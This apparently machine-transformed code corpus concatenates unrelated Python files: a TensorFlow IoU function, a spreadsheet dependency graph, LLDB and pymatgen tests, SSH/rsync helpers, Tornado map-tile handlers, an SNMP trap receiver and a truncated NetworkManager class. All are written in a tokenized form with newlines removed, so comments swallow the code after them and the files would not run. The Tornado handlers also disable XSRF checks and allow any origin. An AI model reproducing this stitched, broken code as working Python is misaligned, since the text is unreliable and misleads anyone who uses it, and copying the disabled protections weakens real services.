# -*- coding: utf-8 -*- <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>tensorflow<as>tf<def_stmt>iou_calculate boxes_1 boxes_2<block_start>''' :param boxes_1: [N, 4] [ymin, xmin, ymax, xmax] :param boxes_2: [M, 4] [ymin, xmin. ymax, xmax] :return: '''<with_stmt>tf.name_scope('iou_caculate')<block_start>ymin_1,xmin_1,ymax_1,xmax_1=tf.split(boxes_1 4 axis=1)# ymin_1 shape is [N, 1].. ymin_2,xmin_2,ymax_2,xmax_2=tf.unstack(boxes_2 axis=1)# ymin_2 shape is [M, ].. max_xmin=tf.maximum(xmin_1 xmin_2)<line_sep>min_xmax=tf.minimum(xmax_1 xmax_2)<line_sep>max_ymin=tf.maximum(ymin_1 ymin_2)<line_sep>min_ymax=tf.minimum(ymax_1 ymax_2)<line_sep>overlap_h=tf.maximum(0. min_ymax-max_ymin)# avoid h < 0 overlap_w=tf.maximum(0. min_xmax-max_xmin)<line_sep>overlaps=overlap_h<times>overlap_w<line_sep>area_1=(xmax_1-xmin_1)<times>(ymax_1-ymin_1)# [N, 1] area_2=(xmax_2-xmin_2)<times>(ymax_2-ymin_2)# [M, ] iou=overlaps/(area_1+area_2-overlaps)<line_sep><return>iou<block_end><block_end>
# Copyright (c) 2010 Resolver Systems Ltd, PythonAnywhere LLP # See LICENSE.md # <import_from_stmt>threading Lock<import_from_stmt>.errors report_cell_error CycleError<class_stmt>Node(object)<block_start><def_stmt>__init__ self location children=<none> parents=<none><block_start>self.location=location<line_sep>self.children=children<if>children<else>set()<line_sep>self.parents=parents<if>parents<else>set()<line_sep>self.lock=Lock()<block_end><def_stmt>__eq__ self other<block_start><return>(self.location<eq>other.location<and>self.children<eq>other.children<and>self.parents<eq>other.parents)<block_end><def_stmt>__ne__ self other<block_start><return><not>self.__eq__(other)<block_end><def_stmt>__repr__ self<block_start><return>"<Node %d,%d children={%s} parents={%s}>"%(self.location[0] self.location[1] ', '.join(str(i)<for>i self.children) ', '.join(str(i)<for>i self.parents))<block_end><def_stmt>remove_from_parents self parent_nodes leaf_queue<block_start><for_stmt>parent parent_nodes<block_start>parent.lock.acquire()<line_sep>parent.children.remove(self.location)<if_stmt>len(parent.children)<eq>0<block_start>leaf_queue.put(parent.location)<block_end>parent.lock.release()<block_end><block_end><block_end><def_stmt>build_dependency_graph worksheet<block_start>graph={}<line_sep>visited=set()<for_stmt>loc worksheet.keys()<block_start><try_stmt><block_start>_generate_cell_subgraph(worksheet graph loc visited [])<block_end><except_stmt>CycleError<block_start><pass><block_end><block_end># Deal with escapees leaves=[]<for_stmt>loc,deps graph.iteritems()<block_start><if_stmt><not>deps.children<block_start>leaves.append(loc)<block_end><block_end><return>graph leaves<block_end><def_stmt>_generate_cell_subgraph worksheet graph loc completed path<block_start><if_stmt>loc<not><in>worksheet<block_start><return><block_end>cell=worksheet[loc]<if_stmt>loc<in>completed<block_start><if_stmt>type(cell.error)<eq>CycleError<block_start><raise>cell.error<block_end><else_stmt><block_start><return><block_end><block_end><if_stmt>loc<in>path<block_start>cycle_error=CycleError(path[path.index(loc):]+[loc])<line_sep>report_cell_error(worksheet loc cycle_error)<line_sep>completed.add(loc)<line_sep><raise>cycle_error<block_end><if_stmt>cell.python_formula<block_start>valid_dependencies=set()<for_stmt>dep_loc cell.dependencies<block_start>dep_cell=worksheet[dep_loc]<try_stmt><block_start>_generate_cell_subgraph(worksheet graph dep_loc completed path+[loc])<if_stmt>dep_cell.error<block_start><continue><block_end><if_stmt><not>dep_cell.python_formula<block_start><continue><block_end>valid_dependencies.add(dep_loc)<block_end><except_stmt>CycleError<as>cycle_error<block_start><if_stmt><not>loc<in>completed<block_start>report_cell_error(worksheet loc cycle_error)<block_end><if_stmt>loc<in>cycle_error.path<block_start>completed.add(loc)<line_sep><raise>cycle_error<block_end><block_end><block_end>_add_location_dependencies(graph loc valid_dependencies)<block_end>completed.add(loc)<block_end><def_stmt>_add_location_dependencies graph location dependencies<block_start><if_stmt>location<not><in>graph<block_start>graph[location]=Node(location)<block_end>graph[location].children<augor>dependencies<for_stmt>dependency dependencies<block_start><if_stmt>dependency<not><in>graph<block_start>graph[dependency]=Node(dependency)<block_end>graph[dependency].parents.add(location)<block_end><block_end>
<import_stmt>requests<def_stmt>getrev <block_start>resp=requests.get("https://pypi.org/pypi/TwitchIO/json")<line_sep>data=resp.json()["releases"]<line_sep>pre=max(data).split("b")<line_sep>final=f"{pre[0]}b{int(pre[1])+1}"<line_sep><return>final<block_end>print(getrev())<line_sep>
"""Test that forward declaration of a data structure gets resolved correctly."""<import_from_future_stmt> print_function<import_stmt>os<import_stmt>time<import_stmt>lldb<import_from_stmt>lldbsuite.test.lldbtest *<import_stmt>lldbsuite.test.lldbutil<as>lldbutil<class_stmt>ForwardDeclarationTestCase(TestBase)<block_start>mydir=TestBase.compute_mydir(__file__)<def_stmt>test_and_run_command self<block_start>"""Display *bar_ptr when stopped on a function with forward declaration of struct bar."""<line_sep>self.build()<line_sep>exe=os.path.join(os.getcwd() "a.out")<line_sep>self.runCmd("file "+exe CURRENT_EXECUTABLE_SET)<line_sep># Break inside the foo function which takes a bar_ptr argument. lldbutil.run_break_set_by_symbol(self "foo" num_expected_locations=1 sym_exact=<true>)<line_sep>self.runCmd("run" RUN_SUCCEEDED)<line_sep># The stop reason of the thread should be breakpoint. self.expect("thread list" STOPPED_DUE_TO_BREAKPOINT substrs=['stopped' 'stop reason = breakpoint'])<line_sep># The breakpoint should have a hit count of 1. self.expect("breakpoint list -f" BREAKPOINT_HIT_ONCE substrs=[' resolved, hit count = 1'])<line_sep># This should display correctly. # Note that the member fields of a = 1 and b = 2 is by design. self.expect("frame variable --show-types *bar_ptr" VARIABLES_DISPLAYED_CORRECTLY substrs=['(bar) *bar_ptr = ' '(int) a = 1' '(int) b = 2'])<line_sep># And so should this. self.expect("expression --show-types -- *bar_ptr" VARIABLES_DISPLAYED_CORRECTLY substrs=['(bar)' '(int) a = 1' '(int) b = 2'])<block_end><block_end>
# coding: utf-8 """ This module contains all the paths for alls this project's directories, that we created dynamically. All paths are absolute, without symlink and in unicode. We also add the 'apps' and 'libs' directories to the PYTHON PATH, which will make the imports much easier. """<import_stmt>sys<import_stmt>os<import_stmt>tempfile<import_from_stmt>pathlib Path<line_sep># This part is a bit complicated and is not mandatory for your project, but # it renders it completely portable since all directory paths are dynamically # generated instead of being hard coded. # We get the 'settings.py' file path (the __FILE__ variable contains # automatically the path of the current file) and we transform this string # to unicode in case you got non ASCII characters in this name ( # sys.getfilesystemencoding() get us the file system encoding which can be # different for Windows, Mac or Linux) THIS_FILE=Path(__file__)<line_sep># We dynamically create these settings, giving us the absolute path # to the project directory, the root directory containing all our work # and any other directory we might need PROJECT_DIR=THIS_FILE.absolute().resolve()<line_sep>BASE_DIR=PROJECT_DIR.parent.parent<line_sep>APPS_DIR=BASE_DIR/'apps'<line_sep>LIBS_DIR=BASE_DIR/'ignore_this_directory'<line_sep>TEMP_DIR=Path(tempfile.gettempdir())<line_sep># We add the apps and libs directory to the PYTHON PATH, so we can import each # package without prefixing them with the parent package name. This mimic the # behavior we would have if they were at the root directory or installed with # pip. # # E.G: we can do from "app1_hello.views import hello" instead of # "from apps.app1_hello.views import hello" or "import django" instead of # "from libs import django" # # When you have a small project, you can avoid this and put all apps at the root # dir like in the official Django tutorial, but in a big project with a lots of # apps, you usually put them all in an "apps" dir like we did, so it's a good # thing to know. sys.path.append(str(LIBS_DIR))<line_sep>sys.path.append(str(APPS_DIR))<line_sep>
<import_from_future_stmt> print_function<import_stmt>os<import_from_stmt>ConfigParser NoSectionError NoOptionError<import_stmt>paramiko<import_from_stmt>artemis.config get_artemis_config_value<import_from_stmt>artemis.fileman.config_files get_config_value<import_from_stmt>artemis.remote.utils get_ssh_connection<def_stmt>check_config_file ip_address file_path=".artemisrc"<block_start>''' Makes sure all required fields are present in ~./artemisrc. Also performs test for the different options if applicable :param ip_address: The section to look for. Remote ip is assumed. Makes no sense for local ip. :return: '''<line_sep>mandatory_options=["username" "python"]<line_sep>artemisrc_path=os.path.expanduser("~/%s"%file_path)<for_stmt>option mandatory_options<block_start><try_stmt><block_start>get_artemis_config_value(section=ip_address option=option)<block_end><except_stmt>NoSectionError<block_start>print("Section %s could not be found in %s. Please provide it."%(ip_address artemisrc_path))<line_sep><raise><block_end><except_stmt>NoOptionError<block_start>print("Section %s does not contain option %s. Please provide it in %s"%(ip_address option artemisrc_path))<line_sep><raise><block_end><block_end># optional_options = ["private_key"] <try_stmt><block_start>private_key_path=get_artemis_config_value(section=ip_address option="private_key")<assert_stmt>os.path.isfile(private_key_path) "The path to the private_key for %s you specified in %s is not valid. You provided %s"%(ip_address artemisrc_path private_key_path)<block_end><except_stmt>NoOptionError<block_start><pass><block_end># username & private key setup tests: <try_stmt><block_start>get_ssh_connection(ip_address)<block_end><except_stmt>paramiko.ssh_exception.AuthenticationException<as>e<block_start><if_stmt>"Authentication failed"<in>e.message<block_start>print("An AuthenticationException is being raised. Make sure you have your private key set up correctly")<block_end><else_stmt><block_start>print("An AuthenticationException is being raised. Did you specify the correct username for %s in %s? You provided the username %s"%(ip_address artemisrc_path get_artemis_config_value(section=ip_address option="username")))<block_end><raise><block_end><except_stmt>paramiko.ssh_exception.SSHException<block_start><try_stmt><block_start>private_key_path=get_artemis_config_value(section=ip_address option="private_key")<line_sep>print("Something is wrong with the private_key you specified in %s for %s . You provided %s"%(artemisrc_path ip_address private_key_path))<line_sep><raise><block_end><except_stmt>NoOptionError<block_start>private_key_path=os.path.join(os.path.expanduser("~") ".ssh/id_rsa")<line_sep>print("You did not provide a private_key path in %s. The default path %s appears to be wrongly set up. "<concat>"Please make sure you have correctly set up your private key for %s "%(artemisrc_path private_key_path ip_address))<block_end><block_end>#python tests: python_path=get_artemis_config_value(section=ip_address option="python")<line_sep>command="python -c 'import os; print(os.path.isfile(os.path.expanduser(\"%s\")))'"%python_path<line_sep>ssh_conn=get_ssh_connection(ip_address)<line_sep>_,stdout,stderr=ssh_conn.exec_command(command)<assert_stmt>stdout.read().strip()<eq>"True" "The provided path to the remote python installation on %s does not exist. You provided %s"%(ip_address python_path)<line_sep>command="%s -c 'print(\"Success\")'"%python_path<line_sep>_,stdout,stderr=ssh_conn.exec_command(command)<line_sep>err=stderr.read().strip()<assert_stmt>stdout.read().strip()<eq>"Success"<and><not>err "The provided python path on %s does not seem to point to a python executable. "<concat>"You provided %s, which resulted in the following error on the remote machine: "%(ip_address python_path err)<block_end><def_stmt>simple_rsync local_path remote_path ip_address verbose=<false><block_start>''' This method synchronizes local_path and all subfolders with remote_path at the given address. This method executes a system rsync call. This is not a general wrapper for rsync. The call is blocking. :param local_path: :param remote_path: Assumed to be relative to the home dir :param ip_address: :return: '''<line_sep>options="-ah"<if_stmt>verbose<block_start>options<augadd>"v"<block_end>local_path=os.path.expanduser(local_path)<line_sep>username=get_artemis_config_value(section=ip_address option="username")<if_stmt>remote_path.startswith("~")<block_start>remote_path=remote_path[1:]<block_end><if_stmt>remote_path.startswith(("/"))<block_start>remote_path=remote_path[1:]<block_end># to_path = "%s@%s:/home/%s/%s" % (username, address, username, remote_path) to_path="%s@%s:~/%s"%(username ip_address remote_path)<line_sep><return>rsync(options from_path=local_path to_path=to_path)<block_end><def_stmt>rsync options from_path to_path<block_start>''' basic rsync wrapper :param options: :param from_path: :param to_path: :return: '''<import_stmt>subprocess<line_sep>print("Starting: rsync %s %s %s"%(options from_path to_path))<if_stmt><not>type(options)<is>list<block_start>options=[options]<block_end>command=subprocess.Popen(["rsync"]+options+[from_path to_path] stdout=subprocess.PIPE stderr=subprocess.PIPE bufsize=1)<if_stmt>"v"<in>options<block_start><while_stmt><true><block_start>line=command.stdout.readline()<if_stmt>line<ne>''<block_start>print(line.rstrip())<block_end><else_stmt><block_start><break><block_end><block_end><block_end>err=command.stderr.read().strip()<if_stmt>err<block_start>msg="rsync received messages on stderr. This might indicate that the command failed or, if you transferred to a remote server,"<concat>" it might just be some message received by the remote server. \n"<concat>"This is because rsync automatically forwards all messages by the remote server to stderr. \n"<concat>"If you are confident that the call succeeded although stderr received messages, then catch the RuntimeError accordingly.\n "<concat>"The messages received are: \n %s"%err<line_sep><raise>RuntimeError(msg)<block_end>print("rsync finished")<line_sep><return><true><block_end>
<import_stmt>os<import_stmt>unittest<import_stmt>warnings<import_from_stmt>pymatgen.analysis.solar.slme optics slme<import_from_stmt>pymatgen.util.testing PymatgenTest<class_stmt>SolarTest(PymatgenTest)<block_start>_multiprocess_shared_=<true><def_stmt>setUp self<block_start>warnings.simplefilter("ignore")<block_end><def_stmt>tearDown self<block_start>warnings.simplefilter("default")<block_end><def_stmt>test_slme_from_vasprun self<block_start>path=os.path.join(os.path.dirname(__file__) "vasprun.xml")<line_sep>en,abz,dirgap,indirgap=optics(path)<line_sep>abz=abz<times>100.0<line_sep>eff=slme(en abz indirgap indirgap plot_current_voltage=<false>)<line_sep>self.assertAlmostEqual(eff 27.728998512472298 places=5)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
""" All the functions to manipulate the resource fields, state changes, etc. Grouped by the type of the fields and the purpose of the manipulation. Used in the handling routines to check if there were significant changes at all (i.e. not our own internal and system changes, like the uids, links, etc), and to get the exact per-field diffs for the specific handler functions. All the functions are purely data-manipulative and computational. No external calls or any i/o activities are done here. """<line_sep>
<import_stmt>unittest<import_stmt>os<import_stmt>sys<if_stmt>os.environ.get('USELIB')<ne>'1'<block_start>sys.path.insert(0 os.path.join(os.path.dirname(__file__) '..'))<block_end><import_from_stmt>pyleri KeywordError create_grammar Tokens <line_sep># nopep8 <class_stmt>TestTokens(unittest.TestCase)<block_start><def_stmt>test_tokens self<block_start>spaced='== != >= <= > <'<line_sep>tokens=Tokens('== > != < >= <= ')<line_sep>grammar=create_grammar(tokens)<line_sep>self.assertEqual(spaced str(tokens))<line_sep>self.assertTrue(grammar.parse('==').is_valid)<line_sep>self.assertTrue(grammar.parse('<=').is_valid)<line_sep>self.assertTrue(grammar.parse('>').is_valid)<line_sep>self.assertFalse(grammar.parse('').is_valid)<line_sep>self.assertFalse(grammar.parse('=').is_valid)<line_sep>self.assertEqual(str(grammar.parse('')) 'error at position 0, expecting: == != >= <= > <')<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>concurrent.futures ThreadPoolExecutor<import_from_stmt>datetime datetime timedelta<import_stmt>json<import_from_stmt>ModestMaps.Core Coordinate<import_from_stmt>notebook.base.handlers IPythonHandler<import_from_stmt>tornado concurrent ioloop<import_from_stmt>tornado gen<import_from_stmt>tornado web<import_from_stmt>.utils serialize_config serialize_layer<class_stmt>KTileAsyncClient(object)<block_start>__instance=<none><def_stmt>__new__ cls *args **kwargs<block_start><if_stmt>cls.__instance<is><none><block_start>cls.__instance=super(KTileAsyncClient cls).__new__(cls *args **kwargs)<block_end><return>cls.__instance<block_end><def_stmt>__init__ self<block_start>self.executor=ThreadPoolExecutor(max_workers=4)<line_sep>self.io_loop=ioloop.IOLoop.current()<block_end>@concurrent.run_on_executor<def_stmt>getTileResponse self layer coord extension<block_start><return>layer.getTileResponse(coord extension)<block_end><block_end><class_stmt>KtileHandler(IPythonHandler)<block_start><def_stmt>check_xsrf_cookie self# TODO: Find a way to correctly communicate XSRF secret to # the kernel so ingest requests can be property authenticated <block_start><pass><block_end><def_stmt>initialize self ktile_config_manager<block_start>self.ktile_config_manager=ktile_config_manager<try_stmt><block_start><if_stmt>self.request.headers["Content-Type"].lower().startswith("application/json")<block_start><try_stmt><block_start>body=self.request.body.decode('utf-8')<block_end><except_stmt>AttributeError<block_start>body=self.request.body<block_end>self.request.json=json.loads(body)<block_end><block_end><except_stmt>Exception<block_start>self.request.json=<none><block_end><block_end><def_stmt>post self kernel_id# Note: needs paramater validation <block_start>kwargs={}<if>self.request.json<is><none><else>self.request.json<line_sep>self.ktile_config_manager.add_config(kernel_id **kwargs)<line_sep>self.log.info("Created config for {}".format(kernel_id))<line_sep>self.finish()<block_end><def_stmt>delete self kernel_id<block_start><try_stmt><block_start><del_stmt>self.ktile_config_manager[kernel_id]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(404 u'Kernel %s not found'%kernel_id)<block_end><block_end><def_stmt>get self kernel_id **kwargs<block_start><try_stmt><block_start>config=self.ktile_config_manager[kernel_id]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(404 u'Kernel %s not found'%kernel_id)<block_end>self.finish(serialize_config(config))<block_end><block_end><class_stmt>KtileLayerHandler(IPythonHandler)<block_start><def_stmt>check_xsrf_cookie self# TODO: Find a way to correctly communicate XSRF secret to # the kernel so ingest requests can be property authenticated <block_start><pass><block_end><def_stmt>initialize self ktile_config_manager<block_start>self.ktile_config_manager=ktile_config_manager<block_end><def_stmt>prepare self<block_start><try_stmt><block_start><if_stmt>self.request.headers["Content-Type"].lower().startswith("application/json")<block_start><try_stmt><block_start>body=self.request.body.decode('utf-8')<block_end><except_stmt>AttributeError<block_start>body=self.request.body<block_end>self.request.json=json.loads(body)<block_end><block_end><except_stmt>Exception<block_start>self.request.json=<none><block_end><block_end><def_stmt>post self kernel_id layer_name# Note: needs paramater validation <block_start><try_stmt><block_start>self.ktile_config_manager.add_layer(kernel_id layer_name self.request.json)<line_sep>self.finish()<block_end><except_stmt>Exception<block_start><import_stmt>sys<import_stmt>traceback<line_sep>t,v,tb=sys.exc_info()<line_sep>self.log.error(''.join(traceback.format_exception(t v tb)))<line_sep>self.clear()<line_sep>self.set_status(500)<line_sep>self.finish({'error':traceback.format_exception(t v tb)})<block_end><block_end><def_stmt>get self kernel_id layer_name **kwargs<block_start><try_stmt><block_start>config=self.ktile_config_manager[kernel_id]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(400 u'Kernel %s not found'%kernel_id)<block_end><try_stmt><block_start>layer=config.layers[layer_name]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(404 u'Layer %s not found'%layer_name)<block_end>self.finish(serialize_layer(layer))<block_end><block_end><class_stmt>KtileTileHandler(IPythonHandler)<block_start><def_stmt>initialize self ktile_config_manager<block_start>self.client=KTileAsyncClient()<line_sep>self.ktile_config_manager=ktile_config_manager<block_end>@gen.coroutine<def_stmt>get self kernel_id layer_name x y z extension **kwargs<block_start>config=self.ktile_config_manager[kernel_id]<line_sep>layer=config.layers[layer_name]<line_sep>coord=Coordinate(int(y) int(x) int(z))<line_sep># To run synchronously: # status_code, headers, content = layer.getTileResponse( # coord, extension) status_code,headers,content=<yield>self.client.getTileResponse(layer coord extension)<if_stmt>layer.max_cache_age<is><not><none><block_start>expires=datetime.utcnow()+timedelta(seconds=layer.max_cache_age)<line_sep>headers['Expires']=expires.strftime('%a %d %b %Y %H:%M:%S GMT')<line_sep>headers['Cache-Control']='public, max-age=%d'%layer.max_cache_age<block_end><else_stmt><block_start>headers['Cache-Control']='no-cache, no-store, must-revalidate'<line_sep>headers['Pragma']='no-cache'<line_sep>headers['Expires']='0'<block_end># Force allow cross origin access headers["Access-Control-Allow-Origin"]="*"<line_sep># Fill tornado handler properties with ktile code/header/content <for_stmt>k,v headers.items()<block_start>self.set_header(k v)<block_end>self.set_status(status_code)<line_sep>self.write(content)<block_end><block_end>
''' Created on Nov. 06, 2014 @author: yunli '''<import_from_stmt>pysnmp.carrier.asynsock.dispatch AsynsockDispatcher<import_from_stmt>pysnmp.carrier.asynsock.dgram udp<import_from_stmt>pyasn1.codec.ber decoder<import_from_stmt>pysnmp.proto api<import_from_stmt>threading Thread Event<import_stmt>logging<import_stmt>util<import_stmt>signal<import_stmt>sys<import_stmt>subprocess<import_stmt>concurrent.futures<import_from_stmt>devicePlugin TwoStageConfigurator<import_from_stmt>propLoader OpenClosProperty loadLoggingConfig<import_from_stmt>exception TrapDaemonError<line_sep>moduleName='trapd'<line_sep>loadLoggingConfig(appName=moduleName)<line_sep>logger=logging.getLogger(moduleName)<line_sep>DEFAULT_HOST="0.0.0.0"<line_sep>DEFAULT_PORT=20162<line_sep>DEFAULT_MAX_THREADS=10<line_sep>trapReceiver=<none><def_stmt>onTrap transportDispatcher transportDomain transportAddress wholeMsg# don't even log the trap PDU unless we are at DEBUG level <block_start><if_stmt>logger.isEnabledFor(logging.DEBUG)<block_start><while_stmt>wholeMsg<block_start>msgVer=int(api.decodeMessageVersion(wholeMsg))<if_stmt>msgVer<in>api.protoModules<block_start>pMod=api.protoModules[msgVer]<block_end><else_stmt><block_start>logger.error('Unsupported SNMP version %s'%msgVer)<line_sep><return><block_end>reqMsg,wholeMsg=decoder.decode(wholeMsg asn1Spec=pMod.Message() )<line_sep>logger.info('Notification message from %s:%s '%(transportAddress[0] transportAddress[1]))<line_sep>reqPDU=pMod.apiMessage.getPDU(reqMsg)<if_stmt>reqPDU.isSameTypeWith(pMod.TrapPDU())<block_start><if_stmt>msgVer<eq>api.protoVersion1<block_start>logger.debug('Enterprise: %s'%(pMod.apiTrapPDU.getEnterprise(reqPDU).prettyPrint()))<line_sep>logger.debug('Agent Address: %s'%(pMod.apiTrapPDU.getAgentAddr(reqPDU).prettyPrint()))<line_sep>logger.debug('Generic Trap: %s'%(pMod.apiTrapPDU.getGenericTrap(reqPDU).prettyPrint()))<line_sep>logger.debug('Specific Trap: %s'%(pMod.apiTrapPDU.getSpecificTrap(reqPDU).prettyPrint()))<line_sep>logger.debug('Uptime: %s'%(pMod.apiTrapPDU.getTimeStamp(reqPDU).prettyPrint()))<line_sep>varBinds=pMod.apiTrapPDU.getVarBindList(reqPDU)<block_end><else_stmt><block_start>varBinds=pMod.apiPDU.getVarBindList(reqPDU)<block_end>logger.debug('Var-binds:')<for_stmt>oid,val varBinds<block_start>logger.debug('%s = %s'%(oid.prettyPrint() val.prettyPrint()))<block_end><block_end><block_end><block_end># start the 2-stage configuration in a separate thread <if_stmt>trapReceiver<is><not><none># execute 2-stage configuration callback if there is one configured in openclos.yaml <block_start>callback=trapReceiver.twoStageConfigurationCallback<if_stmt>callback<is><not><none><and>len(callback)<g>0<block_start>proc=subprocess.Popen(callback shell=<true>)<line_sep>returnValue=proc.wait()<if_stmt>returnValue<ne>0# 2-stage configuration callback returns non-zero value indicating we SHOULD NOT continue <block_start>logger.debug('twoStageConfigurationCallback "%s" returns %d, trap ignored'%(callback returnValue))<line_sep><return><block_end><block_end>configurator=TwoStageConfigurator(deviceIp=transportAddress[0] stopEvent=trapReceiver.stopEvent)<line_sep>trapReceiver.executor.submit(configurator.start2StageConfiguration)<block_end><block_end><class_stmt>TrapReceiver()<block_start><def_stmt>__init__ self conf={}<block_start><if_stmt>conf<is><none><or>any(conf)<eq><false><block_start>self.__conf=OpenClosProperty(appName=moduleName).getProperties()<block_end><else_stmt><block_start>self.__conf=conf<block_end># default value self.target=DEFAULT_HOST<line_sep>self.port=DEFAULT_PORT<line_sep># validate required parameter <if_stmt>'snmpTrap'<in>self.__conf<and>'openclos_trap_group'<in>self.__conf['snmpTrap']<and>'target'<in>self.__conf['snmpTrap']['openclos_trap_group']<block_start>self.target=self.__conf['snmpTrap']['openclos_trap_group']['target']<block_end><else_stmt><block_start>logger.info("snmpTrap:openclos_trap_group:target is missing from configuration. using %s"%(self.target))<block_end><if_stmt>'snmpTrap'<in>self.__conf<and>'openclos_trap_group'<in>self.__conf['snmpTrap']<and>'port'<in>self.__conf['snmpTrap']['openclos_trap_group']<block_start>self.port=int(self.__conf['snmpTrap']['openclos_trap_group']['port'])<block_end><else_stmt><block_start>logger.info("snmpTrap:openclos_trap_group:port is missing from configuration. using %d"%(self.port))<block_end><if_stmt>'snmpTrap'<in>self.__conf<and>'threadCount'<in>self.__conf['snmpTrap']<block_start>self.executor=concurrent.futures.ThreadPoolExecutor(max_workers=self.__conf['snmpTrap']['threadCount'])<block_end><else_stmt><block_start>self.executor=concurrent.futures.ThreadPoolExecutor(max_workers=DEFAULT_MAX_THREADS)<block_end># event to stop from sleep self.stopEvent=Event()<line_sep>self.twoStageConfigurationCallback=util.getTwoStageConfigurationCallback(self.__conf)<block_end><def_stmt>threadFunction self<block_start>self.transportDispatcher=AsynsockDispatcher()<line_sep>self.transportDispatcher.registerRecvCbFun(onTrap)<line_sep># UDP/IPv4 self.transportDispatcher.registerTransport(udp.domainName udp.UdpSocketTransport().openServerMode((self.target self.port)))<line_sep>self.transportDispatcher.jobStarted(1)<try_stmt># Dispatcher will never finish as job#1 never reaches zero <block_start>self.transportDispatcher.runDispatcher()<block_end><except_stmt>Exception<as>exc<block_start>logger.error("Encounted error '%s' on trap receiver %s:%d"%(exc self.target self.port))<line_sep>self.transportDispatcher.closeDispatcher()<line_sep><raise>TrapDaemonError("Trap receiver %s:%d"%(self.target self.port) exc)<block_end><else_stmt><block_start>self.transportDispatcher.closeDispatcher()<block_end><block_end><def_stmt>start self<block_start>logger.info("Starting trap receiver...")<line_sep>self.thread=Thread(target=self.threadFunction args=())<line_sep>self.thread.start()<line_sep>logger.info("Trap receiver started on %s:%d"%(self.target self.port))<block_end><def_stmt>stop self<block_start>logger.info("Stopping trap receiver...")<line_sep>self.stopEvent.set()<line_sep>self.executor.shutdown()<line_sep>self.transportDispatcher.jobFinished(1)<line_sep>self.thread.join()<line_sep>logger.info("Trap receiver stopped")<block_end><block_end><def_stmt>trap_receiver_signal_handler signal frame<block_start>logger.debug("received signal %d"%signal)<line_sep>trapReceiver.stop()<line_sep>sys.exit(0)<block_end><def_stmt>main <block_start>signal.signal(signal.SIGINT trap_receiver_signal_handler)<line_sep>signal.signal(signal.SIGTERM trap_receiver_signal_handler)<line_sep><global>trapReceiver<line_sep>trapReceiver=TrapReceiver()<line_sep>trapReceiver.start()<line_sep># Note we have to do this in order for signal to be properly caught by main thread # We need to do the similar thing when we integrate this into sampleApplication.py <while_stmt><true><block_start>signal.pause()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process('test')<line_sep># minimum logging process.MessageLogger=cms.Service("MessageLogger" cerr=cms.untracked.PSet(enable=cms.untracked.bool(<false>)) cout=cms.untracked.PSet(enable=cms.untracked.bool(<true>) threshold=cms.untracked.string('INFO')))<line_sep>process.source=cms.Source('EmptyIOVSource' timetype=cms.string('runnumber') firstValue=cms.uint64(1) lastValue=cms.uint64(1) interval=cms.uint64(1))<line_sep># load calibrations from database process.load('CondCore.CondDB.CondDB_cfi')<line_sep>process.CondDB.connect='sqlite_file:ppsDiamondTiming_calibration.sqlite'# SQLite input process.PoolDBESSource=cms.ESSource('PoolDBESSource' process.CondDB DumpStats=cms.untracked.bool(<true>) toGet=cms.VPSet(cms.PSet(record=cms.string('PPSTimingCalibrationRcd') tag=cms.string('PPSDiamondTimingCalibration'))))<line_sep>process.ppsTimingCalibrationAnalyzer=cms.EDAnalyzer('PPSTimingCalibrationAnalyzer')<line_sep>process.path=cms.Path(process.ppsTimingCalibrationAnalyzer)<line_sep>
"""NetworkInterface object for Network Manager."""<import_from_stmt>typing Optional<import_from_stmt>...utils.dbus DBus<import_from_stmt>..const DBUS_ATTR_ACTIVE_CONNECTION DBUS_ATTR_DEVICE_INTERFACE DBUS_ATTR_DEVICE_TYPE DBUS_ATTR_DRIVER DBUS_ATTR_MANAGED DBUS_IFACE_DEVICE DBUS_NAME_NM DBUS_OBJECT_BASE DeviceType <import_from_stmt>..interface DBusInterfaceProxy<import_from_stmt>.connection NetworkConnection<import_from_stmt>.setting NetworkSetting<import_from_stmt>.wireless NetworkWireless<class_stmt>NetworkInterface(DBusInterfaceProxy)<block_start>"""NetworkInterface object represents Network Manager Device objects. https://developer.gnome.org/NetworkManager/stable/gdbus-org.freedesktop.NetworkManager.Device.html """<def_stmt>__init__ self nm_dbus:DBus object_path:str<arrow><none><block_start>"""Initialize NetworkConnection object."""<line_sep>self.object_path=object_path<line_sep>self.properties={}<line_sep>self.primary=<false><line_sep>self._connection:Optional[NetworkConnection]=<none><line_sep>self._settings:Optional[NetworkSetting]=<none><line_sep>self._wireless:Optional[NetworkWireless]=<none><line_sep>self._nm_dbus:DBus=nm_dbus<block_end>@property<def_stmt>name self<arrow>str<block_start>"""Return interface name."""<line_sep><return>self.properties[DBUS_ATTR_DEVICE_INTERFACE]<block_end>@property<def_stmt>type self<arrow>int<block_start>"""Return interface type."""<line_sep><return>self.properties[DBUS_ATTR_DEVICE_TYPE]<block_end>@property<def_stmt>driver self<arrow>str<block_start>"""Return interface driver."""<line_sep><return>self.properties[DBUS_ATTR_DRIVER]<block_end>@property<def_stmt>managed self<arrow>bool<block_start>"""Return interface driver."""<line_sep><return>self.properties[DBUS_ATTR_MANAGED]<block_end>@property<def_stmt>connection self<arrow>Optional[NetworkConnection]<block_start>"""Return the connection used for this interface."""<line_sep><return>self._connection<block_end>@property<def_stmt>settings self<arrow>Optional[NetworkSetting]<block_start>"""Return the connection settings used for this interface."""<line_sep><return>self._settings<block_end>@property<def_stmt>wireless self<arrow>Optional[NetworkWireless]<block_start>"""Return the wireless data for this interface."""<line_sep><return>self._wireless<block_end><async_keyword><def_stmt>connect self<arrow><none><block_start>"""Get device information."""<line_sep>self.dbus=<await>DBus.connect(DBUS_NAME_NM self.object_path)<line_sep>self.properties=<await>self.dbus.get_properties(DBUS_IFACE_DEVICE)<line_sep># Abort if device is not managed <if_stmt><not>self.managed<block_start><return><block_end># If active connection exists <if_stmt>self.properties[DBUS_ATTR_ACTIVE_CONNECTION]<ne>DBUS_OBJECT_BASE<block_start>self._connection=NetworkConnection(self.properties[DBUS_ATTR_ACTIVE_CONNECTION])<line_sep><await>self._connection.connect()<block_end># Attach settings 